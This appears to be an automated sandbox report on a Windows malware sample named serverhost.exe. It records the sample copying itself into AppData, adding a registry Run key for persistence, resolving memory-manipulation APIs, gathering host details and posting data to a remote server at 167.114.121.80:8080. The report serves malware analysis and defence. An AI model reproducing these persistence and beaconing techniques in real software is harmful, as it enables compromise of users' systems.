| private_0x00000000009d0000 | 0x009d0000 | 0x009d8fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009d0000 | 0x009d0000 | 0x009dcfff | Private Memory | Readable, Writable |
|
|
|
|
| serverhost.exe | 0x009e0000 | 0x009fafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000a00000 | 0x00a00000 | 0x015fffff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x01600000 | 0x018cefff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000018d0000 | 0x018d0000 | 0x019aefff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000019b0000 | 0x019b0000 | 0x01aaffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001ab0000 | 0x01ab0000 | 0x01b9ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001ab0000 | 0x01ab0000 | 0x01af7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001b00000 | 0x01b00000 | 0x01b47fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001b50000 | 0x01b50000 | 0x01b5ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000001b50000 | 0x01b50000 | 0x01b53fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000001b50000 | 0x01b50000 | 0x01b51fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001b60000 | 0x01b60000 | 0x01b9ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001ba0000 | 0x01ba0000 | 0x01c9ffff | Private Memory | Readable, Writable |
|
|
|
|
| serverhost.exe | 0x01ca0000 | 0x01cb6fff | Memory Mapped File | Readable |
|
|
|
|
| rsaenh.dll | 0x01ca0000 | 0x01cdbfff | Memory Mapped File | Readable |
|
|
|
|
| rsaenh.dll | 0x01ca0000 | 0x01cdbfff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000001ca0000 | 0x01ca0000 | 0x01ca3fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| index.dat | 0x01ca0000 | 0x01caffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| index.dat | 0x01cb0000 | 0x01cb7fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| index.dat | 0x01cc0000 | 0x01ccffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000001cd0000 | 0x01cd0000 | 0x01cd0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000001cd0000 | 0x01cd0000 | 0x01cd0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001ce0000 | 0x01ce0000 | 0x01ceffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001d40000 | 0x01d40000 | 0x01e3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001e40000 | 0x01e40000 | 0x01f3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001f40000 | 0x01f40000 | 0x01fcffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001fd0000 | 0x01fd0000 | 0x0205ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002060000 | 0x02060000 | 0x0215ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002160000 | 0x02160000 | 0x021effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000021f0000 | 0x021f0000 | 0x022effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002320000 | 0x02320000 | 0x0241ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002420000 | 0x02420000 | 0x0261ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000025c0000 | 0x025c0000 | 0x026bffff | Private Memory | Readable, Writable |
|
|
|
|
| imageres.dll | 0x6bc60000 | 0x6cfb5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imageres.dll | 0x6bd90000 | 0x6d0e5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imageres.dll | 0x6cfc0000 | 0x6e315fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imageres.dll | 0x6d0f0000 | 0x6e445fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rasapi32.dll | 0x6e320000 | 0x6e371fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rasadhlp.dll | 0x6f6f0000 | 0x6f6f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| apphelp.dll | 0x711a0000 | 0x711ebfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| comctl32.dll | 0x71b80000 | 0x71c03fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rasman.dll | 0x71c90000 | 0x71ca4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winrnr.dll | 0x71ce0000 | 0x71ce7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pnrpnsp.dll | 0x71cf0000 | 0x71d01fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| napinsp.dll | 0x71d10000 | 0x71d1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sensapi.dll | 0x72570000 | 0x72575fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fwpuclnt.dll | 0x73240000 | 0x73277fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winnsi.dll | 0x73350000 | 0x73356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iphlpapi.dll | 0x73360000 | 0x7337bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nlaapi.dll | 0x73480000 | 0x7348ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntmarta.dll | 0x73790000 | 0x737b0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rtutils.dll | 0x737c0000 | 0x737ccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x73a20000 | 0x73a2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| windowscodecs.dll | 0x73a40000 | 0x73b3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| uxtheme.dll | 0x73ea0000 | 0x73edffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| propsys.dll | 0x73ee0000 | 0x73fd4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| comctl32.dll | 0x74020000 | 0x741bdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wshtcpip.dll | 0x74620000 | 0x74624fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| userenv.dll | 0x746f0000 | 0x74706fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x748b0000 | 0x748eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dnsapi.dll | 0x74990000 | 0x749d3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wship6.dll | 0x74ac0000 | 0x74ac5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mswsock.dll | 0x74ad0000 | 0x74b0bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x74b10000 | 0x74b25fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x74f70000 | 0x74f8afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x74f90000 | 0x74f9bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| profapi.dll | 0x75040000 | 0x7504afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msasn1.dll | 0x750b0000 | 0x750bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| devobj.dll | 0x75150000 | 0x75161fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x751a0000 | 0x751e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| crypt32.dll | 0x751f0000 | 0x7530cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cfgmgr32.dll | 0x75310000 | 0x75336fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x75340000 | 0x753dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x753e0000 | 0x7546efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wldap32.dll | 0x754a0000 | 0x754e4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x754f0000 | 0x75590fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wininet.dll | 0x755a0000 | 0x75694fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x756a0000 | 0x7573cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shell32.dll | 0x75740000 | 0x76389fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x76390000 | 0x7645bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x76460000 | 0x76494fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76500000 | 0x765d3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iertutil.dll | 0x765e0000 | 0x767dafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x767fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76800000 | 0x7695bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| normaliz.dll | 0x76960000 | 0x76962fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76970000 | 0x769f2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| urlmon.dll | 0x76a80000 | 0x76bb5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76bc0000 | 0x76bc9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x76bd0000 | 0x76c98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| setupapi.dll | 0x76ca0000 | 0x76e3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x76e40000 | 0x76eebfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x76ef0000 | 0x7702bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x77030000 | 0x77048fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x77060000 | 0x770b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x770c0000 | 0x770c5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x770d0000 | 0x7711dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| apisetschema.dll | 0x77130000 | 0x77130fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\email.doc | desired_access = GENERIC_READ |
|
1 | |
| Create | C:\a\foobar.bmp | desired_access = GENERIC_READ |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe | type = size |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | ||
| Write Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | value_name = serverhost, data = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe", size = 148, type = REG_SZ |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x76bd0000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76500000 |
|
2 | |
| Load | ADVAPI32.dll | base_address = 0x75340000 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x77060000 |
|
1 | |
| Load | ntdll.dll | base_address = 0x76ef0000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x75340000 |
|
1 | |
| Load | ole32.dll | base_address = 0x76800000 |
|
1 | |
| Load | shell32.dll | base_address = 0x75740000 |
|
1 | |
| Load | crypt32.dll | base_address = 0x751f0000 |
|
1 | |
| Load | urlmon.dll | base_address = 0x76a80000 |
|
1 | |
| Load | userenv.dll | base_address = 0x746f0000 |
|
1 | |
| Load | wininet.dll | base_address = 0x755a0000 |
|
1 | |
| Load | wtsapi32.dll | base_address = 0x73a20000 |
|
1 | |
| Get Handle | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | base_address = 0x9e0000 |
|
1 | |
| Get Filename | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 |
|
1 | |
| Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
3 | ||
| Get Address | c:\windows\system32\user32.dll | function = ReleaseCapture, address_out = 0x76c069f2 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetProcessWindowStation, address_out = 0x76bddfdc |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetCaretBlinkTime, address_out = 0x76be0d01 |
|
1 | |
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x16f31c |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x16f33c |
|
1 | ||
| Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x16f41c |
|
1 | ||
| Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x16f41c |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x16f41c |
|
1 | ||
| Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x16f41c |
|
1 | ||
| Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x16f41c |
|
1 | ||
| Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x16f41c |
|
1 | ||
| Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x16f41c |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleFileNameA, address_out = 0x765533f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameA, address_out = 0x76536ba9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7654ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpA, address_out = 0x76538c59 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeConsole, address_out = 0x765abfde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameExA, address_out = 0x7658f41f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x7654cf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7654cee8 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = GetUserNameA, address_out = 0x7536a4b4 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrStrIA, address_out = 0x7706d250 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strchr, address_out = 0x76f37690 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x7653480b |
|
1 | |
| Create Mapping | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Map | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, desired_access = FILE_MAP_READ |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = F71GWAT |
|
2 | |
| Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 | |
| Get Time | type = Ticks, time = 22011 |
|
1 | |
| Get Time | type = Ticks, time = 23025 |
|
1 | |
| Get Time | type = Ticks, time = 24024 |
|
1 | |
| Get Time | type = Ticks, time = 25022 |
|
1 | |
| Get Time | type = Ticks, time = 26020 |
|
1 | |
| Get Time | type = Ticks, time = 27081 |
|
2 | |
| Get Time | type = Ticks, time = 28017 |
|
1 | |
| Get Time | type = Ticks, time = 29016 |
|
1 | |
| Get Time | type = Ticks, time = 30014 |
|
1 | |
| Get Time | type = Ticks, time = 31012 |
|
1 | |
| Get Time | type = Ticks, time = 32027 |
|
1 | |
| Get Time | type = Ticks, time = 33025 |
|
1 | |
| Get Time | type = Ticks, time = 34023 |
|
1 | |
| Get Time | type = Ticks, time = 35022 |
|
1 | |
| Get Time | type = Ticks, time = 36020 |
|
1 | |
| Get Time | type = Ticks, time = 37019 |
|
1 | |
| Get Time | type = Ticks, time = 38017 |
|
1 | |
| Get Time | type = Ticks, time = 39031 |
|
1 | |
| Get Time | type = Ticks, time = 40014 |
|
1 | |
| Get Time | type = Ticks, time = 41012 |
|
1 | |
| Get Time | type = Ticks, time = 42026 |
|
1 | |
| Get Time | type = Ticks, time = 43025 |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = MA991ED3B |
|
1 | |
| Create | mutex_name = Global\I78B95E2E |
|
1 | |
| Create | mutex_name = Global\M78B95E2E |
|
1 | |
| Release | mutex_name = Global\I78B95E2E |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 0.32 KB (330 bytes) |
| Total Data Received | 0.15 KB (156 bytes) |
| Contacted Host Count | 1 |
| Contacted Hosts | 167.114.121.80 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) |
| Server Name | 167.114.121.80 |
| Server Port | 8080 |
| Username | 0 |
| Password | 0 |
| Data Sent | 0.32 KB (330 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 167.114.121.80, server_port = 8080, user_name = 0, password = 0 |
|
1 | |
| Open HTTP Request | http_verb = POST, referrer = 0, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = 0 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session |
|
1 |
